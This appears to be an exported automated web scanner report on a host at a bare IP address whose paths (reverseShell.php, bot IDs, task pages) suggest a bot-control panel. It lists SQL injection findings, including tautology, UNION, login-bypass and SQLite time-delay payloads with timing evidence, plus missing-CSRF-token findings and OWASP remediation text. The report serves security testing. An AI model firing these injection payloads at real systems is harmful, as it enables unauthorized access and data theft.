URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=56-2
Method GET
Parameter id
Attack 56-2
Evidence
Request Header - size: 706 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query%25
Method GET
Parameter query
Attack query%
Evidence
Request Header - size: 474 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query+AND+1%3D1+--+
Method GET
Parameter query
Attack query AND 1=1 --
Evidence
Request Header - size: 485 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW%22+AND+%221%22%3D%221%22+--+
Method POST
Parameter key
Attack EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW" AND "1"="1" --
Evidence
Request Header - size: 632 bytes.
Request Body - size: 33 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW%27+AND+%271%27%3D%271%27+--+
Method POST
Parameter key
Attack EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW' AND '1'='1' --
Evidence
Request Header - size: 1,090 bytes.
Request Body - size: 208 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW+AND+1%3D1+--+
Method POST
Parameter key
Attack EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW AND 1=1 --
Evidence
Request Header - size: 1,075 bytes.
Request Body - size: 129 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter customArgs
Attack OR 1=1 --
Evidence
Request Header - size: 855 bytes.
Request Body - size: 152 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter limit
Attack ' UNION SELECT @@version -- -" OR "1"="1
Evidence
Request Header - size: 855 bytes.
Request Body - size: 160 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter params
Attack ' UNION SELECT @@version -- - AND 1=1 --
Evidence
Request Header - size: 855 bytes.
Request Body - size: 152 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter sec-ch-ua
Attack "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"%
Evidence
Request Header - size: 856 bytes.
Request Body - size: 138 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Upgrade-Insecure-Requests
Attack 1' AND '1'='1' --
Evidence
Request Header - size: 871 bytes.
Request Body - size: 138 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=56-2
Method POST
Parameter id
Attack 56-2
Evidence
Request Header - size: 857 bytes.
Request Body - size: 138 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query+AND+1%3D1+--+
Method POST
Parameter query
Attack query AND 1=1 --
Evidence
Request Header - size: 505 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
Instances 60
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
WSTG-v42-INPV-05
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 40018
High
SQL Injection - Authentication Bypass
Description
SQL injection may be possible on a login page, potentially allowing the application's authentication mechanism to be bypassed
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter sec-ch-ua-platform
Attack "Windows" OR 1=1 --
Evidence
Request Header - size: 635 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter key
Attack EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW AND 1=1 --
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 129 bytes.
Response Header - size: 253 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter key
Attack EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW' AND '1'='1' --
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
Instances 3
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
WSTG-v42-INPV-05
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 40018
High
SQL Injection - SQLite
Description
SQL injection may be possible.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter query
Attack query" | case randomblob(100000) when not null then "" else "" end --
Evidence The query time is controllable using parameter value [query" | case randomblob(100000) when not null then "" else "" end --], which caused the request to take [1,062] milliseconds, parameter value [query" | case randomblob(10000000) when not null then "" else "" end --], which caused the request to take [2,143] milliseconds, when the original unmodified query with value [query] took [455] milliseconds.
Request Header - size: 319 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--
Method GET
Parameter query
Attack case randomblob(10000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [2,172] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [4,246] milliseconds, when the original unmodified query with value [query] took [1,458] milliseconds.
Request Header - size: 494 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [1,097] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [2,074] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [867] milliseconds.
Request Header - size: 298 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [347] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [828] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [191] milliseconds.
Request Header - size: 252 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [363] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [608] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [92] milliseconds.
Request Header - size: 252 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack case randomblob(100000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [776] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [848] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [233] milliseconds.
Request Header - size: 255 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter 327qi
Attack " | case randomblob(100000) when not null then "" else "" end | "
Evidence The query time is controllable using parameter value [" | case randomblob(100000) when not null then "" else "" end | "], which caused the request to take [776] milliseconds, parameter value [" | case randomblob(10000000) when not null then "" else "" end | "], which caused the request to take [2,260] milliseconds, when the original unmodified query with value [327qi] took [535] milliseconds.
Request Header - size: 531 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter query
Attack case randomblob(100000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [1,609] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [1,848] milliseconds, when the original unmodified query with value [query] took [2,021] milliseconds.
Request Header - size: 313 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter 327qi
Attack 327qi * case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [327qi * case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [1,798] milliseconds, parameter value [327qi * case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [3,873] milliseconds, when the original unmodified query with value [327qi] took [1,017] milliseconds.
Request Header - size: 522 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter error.wav
Attack " | case randomblob(100000) when not null then "" else "" end | "
Evidence The query time is controllable using parameter value [" | case randomblob(100000) when not null then "" else "" end | "], which caused the request to take [1,912] milliseconds, parameter value [" | case randomblob(10000000) when not null then "" else "" end | "], which caused the request to take [2,091] milliseconds, when the original unmodified query with value [error.wav] took [1,200] milliseconds.
Request Header - size: 537 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter Sound Effects
Attack " | case randomblob(1000000) when not null then "" else "" end | "
Evidence The query time is controllable using parameter value [" | case randomblob(1000000) when not null then "" else "" end | "], which caused the request to take [1,739] milliseconds, parameter value [" | case randomblob(100000000) when not null then "" else "" end | "], which caused the request to take [3,633] milliseconds, when the original unmodified query with value [Sound Effects] took [1,807] milliseconds.
Request Header - size: 532 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Accept
Attack case randomblob(10000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [1,045] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [2,271] milliseconds, when the original unmodified query with value [text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7] took [909] milliseconds.
Request Header - size: 671 bytes.
Request Body - size: 0 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter host
Attack " | case randomblob(100000) when not null then "" else "" end | "
Evidence The query time is controllable using parameter value [" | case randomblob(100000) when not null then "" else "" end | "], which caused the request to take [182] milliseconds, parameter value [" | case randomblob(10000000) when not null then "" else "" end | "], which caused the request to take [254] milliseconds, when the original unmodified query with value [142.202.242.172] took [179] milliseconds.
Request Header - size: 799 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 325 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack ' | case randomblob(100000) when not null then "" else "" end | '
Evidence The query time is controllable using parameter value [' | case randomblob(100000) when not null then "" else "" end | '], which caused the request to take [761] milliseconds, parameter value [' | case randomblob(10000000) when not null then "" else "" end | '], which caused the request to take [2,198] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [228] milliseconds.
Request Header - size: 725 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [550] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [1,134] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [87] milliseconds.
Request Header - size: 240 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack case randomblob(100000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [363] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [728] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [95] milliseconds.
Request Header - size: 243 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter bot
Attack case randomblob(100000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [499] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [1,482] milliseconds, when the original unmodified query with value [DESKTOP-95IQEEV] took [2,031] milliseconds.
Request Header - size: 818 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter limit
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [947] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [1,144] milliseconds, when the original unmodified query with value [' UNION SELECT @@version -- -] took [769] milliseconds.
Request Header - size: 997 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter 327qi
Attack case randomblob(1000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [1,236] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [1,418] milliseconds, when the original unmodified query with value [327qi] took [1,641] milliseconds.
Request Header - size: 319 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter key
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [366] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [581] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [146] milliseconds.
Request Header - size: 554 bytes.
Request Body - size: 33 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter key
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [501] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [986] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [127] milliseconds.
Request Header - size: 554 bytes.
Request Body - size: 33 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
Instances 21
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
WSTG-v42-INPV-05
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 40024
Medium
Absence of Anti-CSRF Tokens
Description
No Anti-CSRF tokens were found in a HTML submission form.

A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

CSRF attacks are effective in a number of situations, including:

* The victim has an active session on the target site.

* The victim is authenticated via HTTP auth on the target site.

* The victim is on the same local network as the target site.

CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <form action="" method="POST">
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <form action="" method="POST">
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <form action="" method="POST">
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence <form action="" method="GET">
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence <form action="" method="GET">
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence <form method="POST">
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
Instances 6
Solution
Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, use anti-CSRF packages such as the OWASP CSRFGuard.

Phase: Implementation

Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

Phase: Architecture and Design

Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

Note that this can be bypassed using XSS.

Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

Note that this can be bypassed using XSS.

Use the ESAPI Session Management control.

This control includes a component for CSRF.

Do not use the GET method for any request that triggers a state change.

Phase: Implementation

Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
Reference https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
https://cwe.mitre.org/data/definitions/352.html
Tags OWASP_2021_A01
WSTG-v42-SESS-05
OWASP_2017_A05
CWE Id 352
WASC Id 9
Plugin Id 10202
Medium
Anti-CSRF Tokens Check
Description
A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

CSRF attacks are effective in a number of situations, including:

* The victim has an active session on the target site.

* The victim is authenticated via HTTP auth on the target site.

* The victim is on the same local network as the target site.

